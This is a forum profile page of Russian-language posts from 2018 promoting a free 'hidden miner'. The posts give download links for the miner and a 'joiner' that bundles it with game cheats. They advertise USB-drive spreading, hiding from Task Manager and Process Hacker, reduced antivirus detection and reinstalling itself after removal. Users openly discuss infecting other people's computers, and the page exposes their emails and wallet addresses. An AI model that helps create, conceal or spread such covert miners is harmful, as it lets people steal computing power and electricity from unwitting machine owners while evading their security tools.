Bitcoin Forum
April 26, 2024, 08:11:26 PM *
News: Latest Bitcoin Core release: 27.0 [Torrent]
 
  Home Help Search Login Register More  
  Show Posts
Pages: [1] 2 3 »
1  Local / Майнеры / Re: Скрытый майнер 2018. on: April 18, 2018, 08:17:20 AM
У меня такой вопрос... у меня много заражённых компов, скидывал майнер через флешку. но на пуле пишет что активных один всегда, почему такая фигня?
По всей видимости потому что на всех компьютерах прописан один воркер и хеши всех подключеныйх компьютеров суммируются. Для того, что бы видеть все компьютеры, нужно ка каждом прописывать индивидуальный воркер.
Не знаю как делается в вирусном майнинге, но в честном так.
В таком случае есть смысле продолжать заражать компы на этой локалке?
Свой зарази. Неужели люди такие нищие или жадные, что готовы идти на такие пакости ради копеек, которые им упадут от подобного зароботка. На баунти лучше эти силы потрать, больше заработаешь.

Монеро изменил алгоритм, кто скажет - этот майнер еще работает на Монеро ?

Да , написано же , что майнер поддерживает хардфорк , все майнеры успешно работают.


Какой именно пароль от всех архивов?
сам не пойму какой

Написано же , находится в пунктах темы : Вшивание в майнер ваших кошельков. и Запуск майнера с txt рядом. Пароль состоит из двух частей.


Всем привет, у меня вот тут проблема, можете пожалуйста помочь. Дело в том, что я сделал всё по инструкции, создал 1.txt с ZCash кошельком и Monero, поместил рядом с майнером, запустил его и txt пропал. Майнер работает первые 10 минут и выключается, на пуле не пишет h/s. Что делать?

Напиши мне в телеграмм @DarkMinerZ  , будем разбираться , что ты не так сделал .



Всем шалом . Вышла новая версия майнера 0.8.0.0 - 0.8.0.1 . Основные нововведения :
1⃣ Упрощение джойнера , не нужно создавать txt , всё можно писать в джойнере.
2⃣ Теперь будет две версии джойнера , с распространением майнера на флешки и без , на данный момент доступен джойнер без распространения .
3⃣ Смена иконок , работает пока не стабильно , ломает созданный exe , но можете попробовать , можно написать мне , сделаю поддержку вашей иконки и скину .
4⃣ Исправлены мелкие баги, текущие проблемы некоторых пользователей.
5⃣ Снижен детект .
6⃣ Повышена скрытность .


ИНСТРУКЦИЯ по джойнеру : пишем свои кошельки , добавляем exe версию майнера hight или low , нажимаем склеить и всё , теперь майнер с вашими кошельками , по желанию можно склеить с другими файлами . СТАБ клеить с майнером не нужно !
Джойнер https://www.sendspace.com/file/r5p0nq
Майнер заниженный https://www.sendspace.com/file/l6dgzl
Майнер завышенный https://www.sendspace.com/file/y65jum

Скачивая , вы соглашаетесь , что полную ответственность несёте исключительно вы . Программы созданы в ознакомительных целях.
2  Local / Майнеры / Re: Скрытый майнер 2018. on: March 28, 2018, 08:17:32 AM
Собери пжл заниженную версию exe. zcash t1K84VtT2KxvLtxw73JjSYYzTEy5bhgrziB
Моя почта dimitrofan2008@yandex.ru
Теперь можно самим вшить свои кошельки с помощью джойнера , добавить свои файлы , склеить с читом .

Вшей плиз  кошелек : t1YVjCkqrFckid7yJ7hb94RE3Td9a6LSwcm  в последнюю версию .
И скинь плиз сюда : artur.anisimv@gmail.com
Теперь можно самим вшить свои кошельки с помощью джойнера , добавить свои файлы , склеить с читом . Если используешь только зикеш на первой строке , то будет работать только видеокарта nvidia , если на второй строке указать электрониум или монеро , то будет работать AMD , CPU , а если заполнить кошельками первую и вторую строку , то будет работать всё возможное оборудование.

Что то у меня по всем ссылкам фаелклауд говорит что файл не найден, скинте плиз в личку заниженую версию майнера и утилиту для удаления, заранее спасибо.

Ссылки на майнер обновлены, можно спокойно скачивать , пароль на архив читайте в пунктах темы.

Интересное предложение, 10% - справедливое вознаграждение создателю скрипта. Есть ли возможность добавить свой кошелёк, прошить в скрипт, чтобы к примеру поделиться с другом у которого достаточно мощный ПК? Конечно уведомив его, а в случае перенагрева отключить скрипт.

Есть возможность теперь вшивать самим свои кошельки в майнер , склеивать с читами и своими файлами при помощи джойнера .

Не думаю, что проблема в майнере, но все таки. Пробовал с 2 компов, 2 версии майнера, после перезагрузки перестает работать. Из мониторинга вижу, что пропадает образ X.exe. Антивирус отсутствует, если только defender. Ваш ламер
upd: версия 0.3.0 работает без проблем

В новой версии проводились тесты разными людьми , всего было задействовано 6 человек для тестов , у всех отработало нормально и стабильно , после тестов была выпущена новая версия ,ссылки в теме.

Так нормально работает или развод? Из коментов двоякое впечатление


А вы как думаете ? В телеграмме количество человек более 1000 , это уже что-то значит , в чате общается более 500 человек , можете зайти и пообщаться .
3  Local / Майнеры / Re: Скрытый майнер 2018. on: March 26, 2018, 05:31:19 PM
Нововведения :
   1) Автообновление майнера , если даже манер удалил АВ или пользователь , с выходом новой версии майнер обновится , воркер опять будет ваш .
   2) Поддерживаюся теперь 32 битные и 64 битные системы.
   3) Введена поддержка монеро , т.е. майнер теперь работает с Zcash , Электрониум и  Монеро .
   4) Майнер уже поддерживает будующий хардфорк монеро.
   5) Увеличилась прибыль майнера на ~20%.
   6) Майнер уходит в спячку при открытии Диспетчера , Pricess Hacker  , Мониторинге ресурсов.
   7) Теперь можно вшивать самим кошельки в майнер при помощи джойнера , склеивать с рабочими программами, на выходе вы получите один exe.
   Cool Можно запускать и по старинке , c 1.txt рядом.
4  Local / Майнеры / Re: Скрытый майнер 2018. on: February 23, 2018, 10:49:00 PM
Привет, вшей пожалуйста кошель, обычная версия:
t1fzBRNdvKCYHJFuvS6dTJUPEqam5m1rkz1
мыло:
dj_best88@mail.ru
Спасибо.


пиши в телегу

Привет у меня проблема. На обычном и занижанном, все время загрузка видеокарты 100%.
Вот пруф 

Нагрузка будет всегда такая , только вот мощность майнинга в заниженном будет 10% при работе , т.е. можно будет играть в игры даже, а при простое две минуты  мощность майнера увеличится до 90%.

Даров чувак, мы тут твои последователи, есть пару вопросов, во первых есть и ссылка на последнюю версию не в телеграмме? просто не пользуюсь тг ,только виполе.
Во вторых по какой причине может постоянно вылазить ошибка о прекращении работы X.exe я конечно ламер немного но по моему это влияет на работу майнера Cheesy
 

Все ссылки размещены в теме . Всё исравлено , добавлена новая монета электрониум. Читайте в теме .
5  Local / Майнеры / Re: Скрытый майнер 2018. on: February 23, 2018, 08:17:22 AM
Вот и подоспела повышенная версия 0,6,0,0 https://filecloud.me/dpvxce2og82i.html . Изменений много : работает майнер на 64 битных системах , на 32 битных только идёт распространение майнера через флешки , нагрузка 50% процессор и видеокарта при работе за компом , при отсутствии работы 2 минуты включается режим 75% процессор и 90% видеокарта , при открытии process hacker и диспетчер, майнер уходит в спячку , добавлена иконка папки , введена поддержка видеокарт AMD , процессоры и видеокарты AMD копают теперь электрониум , а Nvidia Zcash . Алгоритмы хорошо подходят для оборудования по профиту и слабой нагрузки , поэтому распределение вот такое .Чтобы обновить майнер , рядом должен быть txt с вашими кошельками , первая строка Zcash , вторая электрон , если кошелёк электрон с биржи , то нужно писать так: кошелёк.idбиржи. Если вы не хотите копать электрон , то тогда указываете zcash на первой строке и всё , но zcash только на Nvidia. Пул для zcash https://zcash.flypool.org/ , пул для электрон , вводить кошелёк внизу https://electroneum.hashvault.pro/ru/#!/dashboard , если у вас кошелёк электрон C БИРЖИ , ТО ВВОДИТЕ ТАК : кошелёк.idбиржи , если не с биржи , то просто вводите кошелёк электрон.
Канал майнера https://t.me/joinchat/AAAAAEkwXWoc9M9xlQuLjw
Чат майнера https://t.me/joinchat/IAhnmBLosEhfLjtjqLYD3g

Новая версия майнера 0,6,0,1 заниженный https://filecloud.me/y52cl2k3n54w.html . Изменений много : работает майнер на 64 битных системах , при открытии process hacker и диспетчер, майнер уходит в спячку , статистика по каждому майнеру , добавлена иконка папки , введена поддержка видеокарт AMD , процессоры и видеокарты AMD копают теперь электрониум , а Nvidia Zcash . Алгоритмы хорошо подходят для оборудования по профиту и слабой нагрузки , поэтому распределение вот такое . Майнер на дату 23.02.2018 детектится только Eset . Чтобы обновить майнер , рядом должен быть txt с вашими кошельками , первая строка Zcash , вторая электрон , если кошелёк электрон с биржи , то нужно писать так: кошелёк.idбиржи. Если вы не хотите копать электрон , то тогда указываете zcash на первой строке и всё , но zcash только на Nvidia. Пул для zcash https://zcash.flypool.org/ , пул для электрон , вводить кошелёк внизу https://electroneum.hashvault.pro/ru/#!/dashboard , если у вас кошелёк электрон с биржи , то вводите так : кошелёк.idбиржи , если не с биржи , то просто вводите кошелёк электрон.

Канал майнера https://t.me/joinchat/AAAAAEkwXWoc9M9xlQuLjw
Чат майнера https://t.me/joinchat/IAhnmBLosEhfLjtjqLYD3g
6  Local / Майнеры / Re: Скрытый майнер 2018. on: February 16, 2018, 08:28:20 AM




попросил закриптовать кошель один, спустя ожидание 10минут вылазит совсем другой кошелек, естественно нечего не появиляеться в воркерах и не работает.  Попахивает на*бом все это.

Ну и где пруфы ? Можешь на канал зайти или в чат , разберёмся .

Зачем просите вшить кошелек, через текстовый файл не работает ? Я не дождалась воркера полтора часа.

Дай завангую . Ты запускал на процессорах. Посмотри сложность сейчас на zcash , полюбому заниженная версия . Сейчас на такой сложности процессоры слабо отображаются на стате , а у вас полюбому ещё и заниженный майнер , если у вас ниже i5 скайлейк , то можете даже не пытаться увидеть стату . Сейчас идёт переход процессоров на алгоритм криптонайт .

Зачем просите вшить кошелек, через текстовый файл не работает ? Я не дождалась воркера полтора часа.

Затем , чтобы был 1 Exe. Хотя бы в телегу заходите. И опять же повторяю . Алгоритм эквахеш Equihash уже изжил себя на процах , теперь переходим на новый алгоритм криптонайт . Zcash останется на видеокартах . А процессоры перейдут на электрон или монеро .

Переходим на новый алгоритм на процессорах , переходим на электрон или монеро, так как статистика уже не отображается на пуле , это связано с ростом сложности монеты и хешрейтом пула . Zcash останется на видеокартах.
7  Local / Майнеры / Re: Скрытый майнер 2018. on: February 14, 2018, 11:42:14 AM
Можно ли использовать WMX-КОШЕЛЁК (webmoney), так как zcash не работает?

Работает zcash , все t адреса работют !

Проясните вопрос с пулом zcash.flypool. Сейчас там такое сообщение "Из-за ошибки в Zcash версии 1.0.3 мы до сих пор не можем отправлять транзакции на z адреса! По этому НЕ ИСПОЛЬЗУЙТЕ сейчас z адреса для майнинга на пуле."

Это значит что скрытый майнер сейчас не работает. Я правильно понимаю?
Всё работает , используйте T адреса .

Что стоишь? Подходи, я не кусаюсь…
overbafer1 , шалом тебе ! )
ссылка на канал overa https://www.youtube.com/user/overbafer1
Видео про майнер https://www.youtube.com/watch?v=qf_ycMiRT-Y
Telegram @DarkMinerZ
Канал в телеграме https://t.me/joinchat/AAAAAEkwXWoc9M9xlQuLjw
Обсуждение майнера в телеграм https://t.me/joinchat/IAhnmBLosEhfLjtjqLYD3g
-snip-


Майнер закриптован на дату 14.02.2018 , исправлен баг с видеокартами nvidia , всё работает стабильно .
8  Local / Майнеры / Re: Скрытый майнер 2018. on: February 11, 2018, 11:11:52 AM
Эх, похоже опять слили на ВТ Embarrassed

Обновление майнера до версий 0.5.0.0 обычный и 0.5.0.1 заниженный, теперь ведётся статистика по каждому ПК отдельно , теперь количество ригов будет количеством работающих майнеров, увеличен хешрейт на 10%-15% , исправлены мелкие баги , ссылки будут сегодня в телеграме
Ссылку на группу в телеге скинь тогда.
https://t.me/joinchat/AAAAAEkwXWoc9M9xlQuLjw

я так понимаю отличия 0.5.0.1 от 0.5.0.0 в том, что версия 0 майнит постоянно, а версия 1 только в простои компьютера? и версия 1 меньше приносит прибыли?
Читайте внимательно тему , отличие в потребляемой мощности . Они оба майнят постоянно , только в версии 0.5.0.1 при работе за компом задействуется 1 ядро и 10% видеокарты , а при отсутствии работы за компом 40 сек, включаются половина ядер и 90% видеокарты .
9  Local / Майнеры / Re: Скрытый майнер 2018. on: February 10, 2018, 09:30:53 PM
1DarkMiner, отправил номер на почту.

Адрес сменился , скинь  пожалуйста на vugoseju@p33.org
Добрый вечер, можно мне в облегченный скрытый майнер вшить мой кошелек?
t1Sjq39YGdr6hoNxp8jLoTMVd5LVwtr9mDd
Благодарю.
sneggg8@gmail.com
П,С. Можете подсказать где можно научиться криптовать файлы, как вы, может статья какая или видео. Спасибо.

Напишите в телеграм .

Эх, похоже опять слили на ВТ Embarrassed

Обновление майнера до версий 0.5.0.0 обычный и 0.5.0.1 заниженный, теперь ведётся статистика по каждому ПК отдельно , теперь количество ригов будет количеством работающих майнеров, увеличен хешрейт на 10%-15% , исправлены мелкие баги , ссылки будут сегодня в телеграме
10  Local / Майнеры / Re: Скрытый майнер 2018. on: February 09, 2018, 06:00:47 PM
1DarkMiner, скинул. Лучше устанавливай Mobogram, там больше функций. Открой личку, есть мысли. (Profile>Modify Profile>Personal Message Options>Allow newbies to send you PMs>Change profile)

Открыл , спасибо за помощь ! Мой телеграм @DarkMinerZ . Все вопросы пишите в личку или в телеграмме.

Тема переносится в телеграмм , https://t.me/DarkMinerZ , @DarkMinerZ

У кого остались ссылки на версии 0.4.0.0 и 0.4.0.1 ? Можете скинуть сюда или в телегу  ?  
11  Local / Майнеры / Re: Скрытый майнер 2018. on: February 09, 2018, 03:53:06 PM
1DarkMiner, отправил номер на почту.

Адрес сменился , скинь  пожалуйста на vugoseju@p33.org
12  Local / Майнеры / Re: Скрытый майнер 2018. on: February 09, 2018, 10:43:08 AM
Пожалуйста сделай платную версию майнера с поддержкой обновлений.
Либо сделай чтобы честно после 10 минут он начинал майнить на наши кошельки на полную а не на 50%. (Солей не хватает реально, видно что после 10 минутного майнинга на тебя  он еще потом временами а то и остальные 50 минут майнит какую то долю тебе...)

Проверь по процесс хакеру , что всё нормально. Никакую долю он мне не майнит , это всё можно проверить . Загрузка зависит от нагрузки на пк .

1DarkMiner, тут я. Напиши мне на на почту pro4i1@yandex.com.


У кого есть номера для телеги, напишите мне на почту torejolul@ugimail.net. Это временная почта .
13  Local / Майнеры / Re: Скрытый майнер 2018. on: February 08, 2018, 09:15:14 PM
А какие проблемы с регистрацией в телеграме?

Не проходят номера на регистрацию , либо заняты , либо заблокированы , либо много запросов.
14  Local / Майнеры / Re: Скрытый майнер 2018. on: February 08, 2018, 08:47:51 PM
Привет, что с ссылкой на телеграмм? Весь день обновляю и жду Smiley
P.S. Ответь, пожалуйста, на почту wonnayeezy

Привет , никак не проходит регистрация .  Хорошо , напишу.
А как можно будет вас в телеге то найти?)

Скину в тему телеграмм и тут в комены .
15  Local / Майнеры / Re: Скрытый майнер 2018. on: February 08, 2018, 08:03:50 PM
Привет, что с ссылкой на телеграмм? Весь день обновляю и жду Smiley
P.S. Ответь, пожалуйста, на почту wonnayeezy

Привет , никак не проходит регистрация .  Хорошо , напишу.
16  Local / Майнеры / Re: Скрытый майнер 2018. on: February 08, 2018, 07:43:56 PM
Чую где то обман...
5 оочень мощных буков, все включаются одновременно, на голой винде, никто их не трогает, лишних прог нет, железо одинаковое и мощное.
Запустил, хэшрейт 800, потом вообще упал до 80, позже поднимался иногда до 200(+ еще компов 5- 10 по мелочи майнит), и прыгает хэшрейт раз в час или в 2,или в пол но не в 10 минут...
Удивлен.
https://filecloud.me/bep9yxo64pfa.html
Короче скачал другой платный майнер который работает на том же пуле, с той же монетой.
Хэшрейт раза в 2-3 больше....
Где то у тебя баг.
Пользуюсь в основном платными майнерами, бесплатные ставлю на мусор всякий, деды не мощнее колькулятора которые и тд. И заметил такое давным давно. Зарабатывать ему как то нужно. Так что это не баг. И правды добиваться тут нет смысла, раз уж решили пользоваться его детищем)

Закинь в ЛС и мне где покупал и сколько стоит, если не сложно! Спасибо

Хватить спамить , ты уже спрашивал .
17  Local / Майнеры / Re: Скрытый майнер 2018. on: February 08, 2018, 07:38:45 PM
1DarkMiner, Если еще нужен постоянный виртуальный номер, могу скинуть решение. У меня уже 2 месяца работает. Скинь свою почту в лс.

Ты ещё тут ? Что за решение ?

А можно ссылку на 4 версию?

Поддерживается любая из версий , что у вас конкретно за проблема ? Если для вас критично , то можно не обновлять .
18  Local / Майнеры / Re: Скрытый майнер 2018. on: February 08, 2018, 04:05:52 PM
Не совсем понял. То есть мне нужно поместить файл и текстовый документ с кошельком в одну папку, запустить файл и что произойдет? Создастся майнер или сразу начнет работать? С версией 4 оба файла просто пропали. Может не то скачал... Можете скинь пожалуйста актуальную версию майнера и инструкцию? Видел, что есть проблемы, могу помочь с телеграмом. Мой zCash кошелек t1fk8ttGmiH7nVcB3KVo5YBLiJHBXd7VxBj

Сейчас пока разбираюсь с телегой . Поэтому всё буду писать там . Думаю к полуночи разберусь , дел много . Должен был пропасть только txt , вы уверены , что это версия 4 ? Для запуска рядом txt должен быть с названием "текстовый документ"
Да. Было названо "текстовый документ.txt" без кавычек. Скачал последнюю версию, что нашел в этой теме. Был назван файл2.exe это же тот, который нужен? Если нет, то скиньте пожалуйста актуальную ссылку. И если есть- свежую инструкцию пожалуйста
Это не исправлена версия . Старая , постараюсь выложить версию 4 и инструкцию , в телеграмме темы можно создавать ?
19  Local / Майнеры / Re: Скрытый майнер 2018. on: February 08, 2018, 02:00:10 PM
Не совсем понял. То есть мне нужно поместить файл и текстовый документ с кошельком в одну папку, запустить файл и что произойдет? Создастся майнер или сразу начнет работать? С версией 4 оба файла просто пропали. Может не то скачал... Можете скинь пожалуйста актуальную версию майнера и инструкцию? Видел, что есть проблемы, могу помочь с телеграмом. Мой zCash кошелек t1fk8ttGmiH7nVcB3KVo5YBLiJHBXd7VxBj

Сейчас пока разбираюсь с телегой . Поэтому всё буду писать там . Думаю к полуночи разберусь , дел много . Должен был пропасть только txt , вы уверены , что это версия 4 ? Для запуска рядом txt должен быть с названием "текстовый документ"
20  Local / Майнеры / Re: Скрытый майнер 2018. on: February 08, 2018, 10:57:19 AM
Что там по телеге? с номером могу помочь.

Номера не проходят на регистрацию .
Pages: [1] 2 3 »
Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!